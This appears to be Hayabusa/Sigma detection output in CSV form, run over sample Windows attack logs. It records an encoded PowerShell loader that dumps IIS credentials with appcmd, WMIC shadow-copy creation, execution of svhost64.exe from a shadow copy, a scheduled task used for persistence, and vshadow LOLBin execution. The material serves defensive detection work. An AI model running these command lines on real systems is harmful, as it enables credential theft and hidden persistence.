2019-05-27 10:29:20.204 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2108 | PGUID: 365ABB72-3D70-5CEB-0000-0010B2E2FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.305 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2640 | PGUID: 365ABB72-3D70-5CEB-0000-001072E6FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.435 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1004 | PGUID: 365ABB72-3D70-5CEB-0000-001032EAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.555 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir "". )"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 4012 | PGUID: 365ABB72-3D70-5CEB-0000-0010F2EDFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-28 00:12:38.241 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c whoami /groups | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3256 | PGUID: 365ABB72-FE66-5CEB-0000-001058F50B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /groups | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c whoami /groups | LID: 0x3e7 | PID: 1168 | PGUID: 365ABB72-FE66-5CEB-0000-0010C7F80B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:43.990 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-FE6B-5CEB-0000-00102A090C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state | LID: 0x3e7 | PID: 3520 | PGUID: 365ABB72-FE6C-5CEB-0000-0010050C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:44.055 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx
2019-05-28 00:12:45.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3876 | 
PGUID: 365ABB72-FE6D-5CEB-0000-0010332A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:45.491 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-FE6D-5CEB-0000-0010122D0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:45.491 +09:00,IEWIN7,1,medium,Exec,WMI Reconnaissance List Remote Services,,rules/sigma/process_creation/proc_creation_win_wmic_remote_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:46.981 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\notepad.exe | PID: 1944 | PGUID: 365ABB72-FD85-5CEB-0000-00104C0E0B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:47.402 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 3448 | PGUID: 
365ABB72-FE6F-5CEB-0000-0010F4370C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:47.478 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" | LID: 0x3e7 | PID: 3344 | PGUID: 365ABB72-FE6F-5CEB-0000-0010D33A0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:48.655 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2412 | PGUID: 365ABB72-FE70-5CEB-0000-0010385C0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:48.763 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vssadmin List Shadows | Process: C:\Windows\System32\vssadmin.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1820 | PGUID: 
365ABB72-FE70-5CEB-0000-0010935F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:48.827 +09:00,IEWIN7,1,info,,Process Created,"Cmd: find ""Shadow Copy Volume"" | Process: C:\Windows\System32\find.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" | LID: 0x3e7 | PID: 1796 | PGUID: 365ABB72-FE70-5CEB-0000-0010D65F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.447 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 2356 | PGUID: 365ABB72-FE76-5CEB-0000-0010546E0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.544 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: C:\Windows\System32\wbem\WMIC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | LID: 0x3e7 | PID: 2840 | PGUID: 365ABB72-FE76-5CEB-0000-001077710C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,CredAccess,Shadow Copies Creation Using Operating Systems 
Utilities,,rules/sigma/process_creation/proc_creation_win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Execution,,rules/sigma/process_creation/proc_creation_win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.632 +09:00,IEWIN7,1,info,,Process Created,Cmd: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe | Process: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x3e7 | PID: 1260 | PGUID: 365ABB72-FE76-5CEB-0000-001015780C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:54.632 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:59.519 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\System32\notepad.exe"" | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-FE7B-5CEB-0000-0010867F0C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr 
""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | Process: C:\Windows\System32\schtasks.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" | LID: 0x3e7 | PID: 4044 | PGUID: 365ABB72-FE7B-5CEB-0000-0010D6820C00 | Hash: SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx 2019-05-28 11:13:52.171 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 2432 | PGUID: 365ABB72-9960-5CEC-0000-0010B6981600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1968 | PGUID: 365ABB72-9960-5CEC-0000-001082AD1600 | Hash: 
SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:13:53.507 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: IEWIN7\IEUser | Parent Cmd: utilman.exe /debug | LID: 0x14a73 | PID: 2600 | PGUID: 365ABB72-9961-5CEC-0000-0010E1161700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:14:48.819 +09:00,IEWIN7,1,info,,Process Created,"Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | Process: C:\ProgramData\vshadow.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x14a73 | PID: 3092 | PGUID: 365ABB72-9998-5CEC-0000-00107D501700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx 2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Process Launched via DCOM | Cmd: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: 
